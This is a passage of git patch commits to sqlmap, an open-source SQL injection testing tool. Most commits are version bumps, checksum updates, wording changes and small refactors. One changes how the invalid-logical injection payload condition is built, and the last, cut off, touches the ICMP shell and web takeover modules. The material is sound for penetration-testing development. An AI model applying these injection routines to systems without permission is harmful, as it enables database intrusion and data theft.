90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 2631a7b046d..fb7bddd7d01 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -253,13 +253,13 @@ def cmdLineParser(argv=None): help="Regexp to exclude parameters from testing (e.g. \"ses\")") injection.add_option("--dbms", dest="dbms", - help="Force back-end DBMS to this value") + help="Force back-end DBMS to provided value") injection.add_option("--dbms-cred", dest="dbmsCred", help="DBMS authentication credentials (user:password)") injection.add_option("--os", dest="os", - help="Force back-end DBMS operating system to this value") + help="Force back-end DBMS operating system to provided value") injection.add_option("--invalid-bignum", dest="invalidBignum", action="store_true", help="Use big numbers for invalidating values") diff --git a/sqlmap.conf b/sqlmap.conf index 522e02df011..5dc78e2463b 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -241,7 +241,7 @@ skipStatic = False # Regexp to exclude parameters from testing (e.g. "ses"). paramExclude = -# Force back-end DBMS to this value. If this option is set, the back-end +# Force back-end DBMS to provided value. If this option is set, the back-end # DBMS identification process will be minimized as needed. # If not set, sqlmap will detect back-end DBMS automatically by default. # Valid: mssql, mysql, mysql 4, mysql 5, oracle, pgsql, sqlite, sqlite3, @@ -256,7 +256,7 @@ dbms = # Syntax: username:password dbmsCred = -# Force back-end DBMS operating system to this value. If this option is +# Force back-end DBMS operating system to provided value. If this option is # set, the back-end DBMS identification process will be minimized as # needed. # If not set, sqlmap will detect back-end DBMS operating system diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3ec7ad935e1..f2345ede3c1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -def1ed8934e08b37d5e6455554cb2be8 lib/core/settings.py +83c0f3f92dc98c530494d0bf32617d0e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -58,7 +58,7 @@ c54afa9950529a5974166464bfd4c34a lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -5e46fac7f824ba8ab8003a1cd47d8af3 lib/parse/cmdline.py +ec0dae17de8c524f86bf66ffcac24093 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py From 091c8ab2dd7c178aa0907a989c277defee67ad4c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 7 Jun 2018 00:37:22 +0200 Subject: [PATCH 158/428] Minor update (switching --invalid-logical to LIKE version) --- lib/controller/checks.py | 2 +- lib/core/agent.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 25ab83be194..44f1ad62704 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -433,7 +433,7 @@ def checkSqlInjection(place, parameter, value): if conf.invalidLogical: _ = int(kb.data.randomInt[:2]) - origValue = "%s AND %s=%s" % (value, _, _ + 1) + origValue = "%s AND %s LIKE %s" % (value, _, _ + 1) elif conf.invalidBignum: origValue = kb.data.randomInt[:6] elif conf.invalidString: diff --git a/lib/core/agent.py b/lib/core/agent.py index b7bb3c4ea34..6f1380ac4b7 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -142,7 +142,7 @@ def payload(self, place=None, parameter=None, value=None, newValue=None, where=N match = re.search(r"\A[^ ]+", newValue) newValue = newValue[len(match.group() if match else ""):] _ = randomInt(2) - value = "%s%s AND %s=%s" % (origValue, match.group() if match else "", _, _ + 1) + value = "%s%s AND %s LIKE %s" % (origValue, match.group() if match else "", _, _ + 1) elif conf.invalidBignum: value = randomInt(6) elif conf.invalidString: diff --git a/lib/core/settings.py b/lib/core/settings.py index 2bea0c6ba05..6df44889d6a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.7" +VERSION = "1.2.6.8" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f2345ede3c1..d74733cfdb7 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,11 +22,11 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -9682b922fd621d31708d562b15803202 lib/controller/checks.py +2bfb57f063421c3789a81cd4ca89d8dc lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py -b1990c7805943f0c973a853bba981d96 lib/core/agent.py +ee096e173a5caa7724e751c693880925 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py 240cb11db16783c6601b1d7de5eadd8d lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -83c0f3f92dc98c530494d0bf32617d0e lib/core/settings.py +9cfb2ab4e4be638f47abb7e8b0bb47e9 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From e0c7b5c63c9ceff394bbcb2a5584c551e6337ad7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 7 Jun 2018 00:46:54 +0200 Subject: [PATCH 159/428] Minor wording update --- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 4 ++-- sqlmap.conf | 4 ++-- txt/checksum.md5 | 4 ++-- 4 files changed, 7 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6df44889d6a..a1f439d09a0 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.8" +VERSION = "1.2.6.9" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index fb7bddd7d01..b8e843fccd3 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -400,7 +400,7 @@ def cmdLineParser(argv=None): help="Search column(s), table(s) and/or database name(s)") enumeration.add_option("--comments", dest="getComments", action="store_true", - help="Retrieve DBMS comments") + help="Check for DBMS comments during enumeration") enumeration.add_option("-D", dest="db", help="DBMS database to enumerate") @@ -581,7 +581,7 @@ def cmdLineParser(argv=None): help="Log all HTTP traffic into a HAR file") general.add_option("--hex", dest="hexConvert", action="store_true", - help="Use DBMS hex function(s) for data retrieval") + help="Use hex conversion during data retrieval") general.add_option("--output-dir", dest="outputDir", action="store", help="Custom output directory path") diff --git a/sqlmap.conf b/sqlmap.conf index 5dc78e2463b..f29a7be423d 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -481,7 +481,7 @@ dumpAll = False # Valid: True or False search = False -# Retrieve back-end database management system comments. +# Check for database management system database comments during enumeration. # Valid: True or False getComments = False @@ -710,7 +710,7 @@ forms = False # Valid: True or False freshQueries = False -# Use DBMS hex function(s) for data retrieval. +# Use hex conversion during data retrieval. # Valid: True or False hexConvert = False diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d74733cfdb7..fc9e300303c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9cfb2ab4e4be638f47abb7e8b0bb47e9 lib/core/settings.py +55f2994073c8311c14895278ee8c8e25 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -58,7 +58,7 @@ c54afa9950529a5974166464bfd4c34a lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py -ec0dae17de8c524f86bf66ffcac24093 lib/parse/cmdline.py +dc7b8fef4125abb26869689b8921b195 lib/parse/cmdline.py fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py 6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py From d47c16e196d671cfc9661485a0064805e43527ed Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 7 Jun 2018 00:55:32 +0200 Subject: [PATCH 160/428] Minor refactoring --- lib/controller/checks.py | 6 +++--- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 44f1ad62704..047c77a05a3 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -558,14 +558,14 @@ def genCmpPayload(): logger.info(infoMsg) else: trueSet = set(extractTextTagContent(trueRawResponse)) - trueSet = trueSet.union(__ for _ in trueSet for __ in _.split()) + trueSet |= set(__ for _ in trueSet for __ in _.split()) falseSet = set(extractTextTagContent(falseRawResponse)) - falseSet = falseSet.union(__ for _ in falseSet for __ in _.split()) + falseSet |= set(__ for _ in falseSet for __ in _.split()) if threadData.lastErrorPage and threadData.lastErrorPage[1]: errorSet = set(extractTextTagContent(threadData.lastErrorPage[1])) - errorSet = errorSet.union(__ for _ in errorSet for __ in _.split()) + errorSet |= set(__ for _ in errorSet for __ in _.split()) else: errorSet = set() diff --git a/lib/core/settings.py b/lib/core/settings.py index a1f439d09a0..bbea665a0ca 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.9" +VERSION = "1.2.6.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fc9e300303c..a76181a480e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,7 +22,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -2bfb57f063421c3789a81cd4ca89d8dc lib/controller/checks.py +94872ce72dc2628cdedf2eb82cba716e lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -55f2994073c8311c14895278ee8c8e25 lib/core/settings.py +65f5f735ff6df29a6675106e920a1c1c lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From 9b397f00be33890821e3739bb2f2af1d7583ae99 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 7 Jun 2018 01:28:02 +0200 Subject: [PATCH 161/428] Minor refactoring --- lib/core/common.py | 3 +-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 8b099c10cb7..a555625cf87 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1866,8 +1866,7 @@ def getFilteredPageContent(page, onlyText=True, split=" "): # only if the page's charset has been successfully identified if isinstance(page, unicode): retVal = re.sub(r"(?si)||%s" % (r"|<[^>]+>|\t|\n|\r" if onlyText else ""), split, page) - while retVal.find(2 * split) != -1: - retVal = retVal.replace(2 * split, split) + retVal = re.sub(r"%s{2,}" % split, split, retVal) retVal = htmlunescape(retVal.strip().strip(split)) return retVal diff --git a/lib/core/settings.py b/lib/core/settings.py index bbea665a0ca..516de7c7ed3 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.10" +VERSION = "1.2.6.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a76181a480e..4d655f91b69 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py ee096e173a5caa7724e751c693880925 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -240cb11db16783c6601b1d7de5eadd8d lib/core/common.py +e722f6285239331de9a528ac662ae05e lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -65f5f735ff6df29a6675106e920a1c1c lib/core/settings.py +7912a54938f8d43bf6ad4adbd6de392c lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From 23777143b6f7364ebc4c9ff0bae50479ed57baf2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 7 Jun 2018 10:07:12 +0200 Subject: [PATCH 162/428] Update related to the #3137 --- lib/core/settings.py | 2 +- lib/utils/api.py | 2 ++ txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 516de7c7ed3..472d0ec1805 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.11" +VERSION = "1.2.6.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/utils/api.py b/lib/utils/api.py index 52ee0f44265..cbdce996790 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -159,6 +159,8 @@ def engine_start(self): self.process = Popen(["python", "sqlmap.py", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN) elif os.path.exists(os.path.join(os.getcwd(), "sqlmap.py")): self.process = Popen(["python", "sqlmap.py", "--api", "-c", configFile], shell=False, cwd=os.getcwd(), close_fds=not IS_WIN) + elif os.path.exists(os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), "sqlmap.py")): + self.process = Popen(["python", "sqlmap.py", "--api", "-c", configFile], shell=False, cwd=os.path.join(os.path.abspath(os.path.dirname(sys.argv[0]))), close_fds=not IS_WIN) else: self.process = Popen(["sqlmap", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 4d655f91b69..41ded7cc88f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7912a54938f8d43bf6ad4adbd6de392c lib/core/settings.py +276640cf3fa694e3cf7e94c207ba14ef lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -99,7 +99,7 @@ f5fb02487edaf9adaa81d54324c84f8f lib/techniques/error/use.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py 94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py 11ecf2effbe9f40b361843d546c3c521 lib/techniques/union/use.py -8d99c07416df40350ff8836d9d79ebb5 lib/utils/api.py +3e404b091e698cceadc1b9d2f1dae4d9 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py 31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py de9620f03231d8329ee8434884b6bacd lib/utils/deps.py From cf4c263a4eb3a4dd33c76814cdaeda6939d2eb72 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 8 Jun 2018 14:45:15 +0200 Subject: [PATCH 163/428] Minor patch --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index a555625cf87..f3771e19ab5 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4385,7 +4385,7 @@ def getRequestHeader(request, name): retVal = None - if request and name: + if request and request.headers and name: _ = name.upper() retVal = max(value if _ == key.upper() else None for key, value in request.header_items()) diff --git a/lib/core/settings.py b/lib/core/settings.py index 472d0ec1805..a0b7ae2e704 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.12" +VERSION = "1.2.6.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 41ded7cc88f..f8047eee02b 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py ee096e173a5caa7724e751c693880925 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -e722f6285239331de9a528ac662ae05e lib/core/common.py +59246d63fd0f8ffa6db61ff1ba0797c8 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -276640cf3fa694e3cf7e94c207ba14ef lib/core/settings.py +6f676678bbe92b0840e37eebbdd5c1e6 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py From b93284530e36e2096150f862ca0f455973c20dae Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 8 Jun 2018 15:13:50 +0200 Subject: [PATCH 164/428] Patch related to the #3139 --- lib/core/settings.py | 2 +- lib/request/httpshandler.py | 3 ++- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index a0b7ae2e704..3ae46d1ca63 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.13" +VERSION = "1.2.6.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/httpshandler.py b/lib/request/httpshandler.py index cb41f5af0ff..a98bdc71b0d 100644 --- a/lib/request/httpshandler.py +++ b/lib/request/httpshandler.py @@ -12,6 +12,7 @@ import urllib2 from lib.core.common import getSafeExString +from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapConnectionException @@ -48,7 +49,7 @@ def create_sock(): # Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext # https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni - if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) is not False and hasattr(ssl, "SSLContext"): + if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) is not False and not any((conf.proxy, conf.tor)) and hasattr(ssl, "SSLContext"): for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols): try: sock = create_sock() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f8047eee02b..efe00f25356 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,7 +47,7 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6f676678bbe92b0840e37eebbdd5c1e6 lib/core/settings.py +9962d6781b4c6d216b2982d3c2e0aa6a lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py @@ -72,7 +72,7 @@ c0cabedead14b8a23353b606672cff42 lib/request/comparison.py 0ad9051e84e8fefe826f1a574b41b1b0 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py -eee965d781546d05f36cfd14af050913 lib/request/httpshandler.py +98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py 1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py c2fb1abbb7127ec6419bbf852c0a458d lib/request/inject.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py From a97fd1dedeb30cfc314a88df2b94e096a3ae4172 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 9 Jun 2018 22:59:08 +0200 Subject: [PATCH 165/428] Fixes #3142 --- lib/core/settings.py | 2 +- lib/core/update.py | 5 ++++- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 3ae46d1ca63..353e7352b45 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.14" +VERSION = "1.2.6.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/update.py b/lib/core/update.py index ce5f87e4811..b9a54e54998 100644 --- a/lib/core/update.py +++ b/lib/core/update.py @@ -85,7 +85,10 @@ def update(): if not success: logger.error("update could not be completed") else: - os.chmod(os.path.join(directory, "sqlmap.py"), attrs) + try: + os.chmod(os.path.join(directory, "sqlmap.py"), attrs) + except OSError: + logger.warning("could not set the file attributes of '%s'" % os.path.join(directory, "sqlmap.py")) else: infoMsg = "updating sqlmap to the latest development revision from the " infoMsg += "GitHub repository" diff --git a/txt/checksum.md5 b/txt/checksum.md5 index efe00f25356..1f0f33c6f03 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -47,14 +47,14 @@ c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9962d6781b4c6d216b2982d3c2e0aa6a lib/core/settings.py +bb3cda01d9f6c71382beba250e0777fc lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 6306284edcccc185b2df085438572b0d lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py de9922a29c71a235cb95a916ff925db2 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py -c54afa9950529a5974166464bfd4c34a lib/core/update.py +9d395b143be295a143eb5c9b926f3569 lib/core/update.py e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py 1e5532ede194ac9c083891c2f02bca93 lib/__init__.py 7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py From c268663bd9ed481a0f44f1defaaee860631f1558 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 9 Jun 2018 23:38:00 +0200 Subject: [PATCH 166/428] Minor code style updates --- extra/icmpsh/icmpsh_m.py | 2 +- extra/mssqlsig/update.py | 4 +-- extra/shutils/newlines.py | 7 ++--- extra/shutils/pep8.sh | 7 ----- extra/shutils/pycodestyle.sh | 7 +++++ extra/shutils/regressiontest.py | 4 +-- lib/core/agent.py | 8 +++--- lib/core/common.py | 12 ++++---- lib/core/decorators.py | 2 +- lib/core/option.py | 4 +-- lib/core/settings.py | 10 +++---- lib/core/target.py | 4 +-- lib/request/basic.py | 1 - lib/request/connect.py | 21 +++++++------- lib/takeover/web.py | 8 +++--- lib/techniques/dns/use.py | 2 +- lib/utils/api.py | 8 ++---- lib/utils/xrange.py | 6 ++-- sqlmap.py | 2 +- tamper/0x2char.py | 1 - tamper/between.py | 2 +- tamper/commentbeforeparentheses.py | 2 +- tamper/informationschemacomment.py | 2 +- tamper/multiplespaces.py | 4 +-- txt/checksum.md5 | 46 +++++++++++++++--------------- waf/cloudbric.py | 3 -- 26 files changed, 85 insertions(+), 94 deletions(-) delete mode 100755 extra/shutils/pep8.sh create mode 100755 extra/shutils/pycodestyle.sh diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py index 23a60b865c4..00fbd8801ee 100644 --- a/extra/icmpsh/icmpsh_m.py +++ b/extra/icmpsh/icmpsh_m.py @@ -80,7 +80,7 @@ def main(src, dst): cmd = '' # Wait for incoming replies - if sock in select.select([ sock ], [], [])[0]: + if sock in select.select([sock], 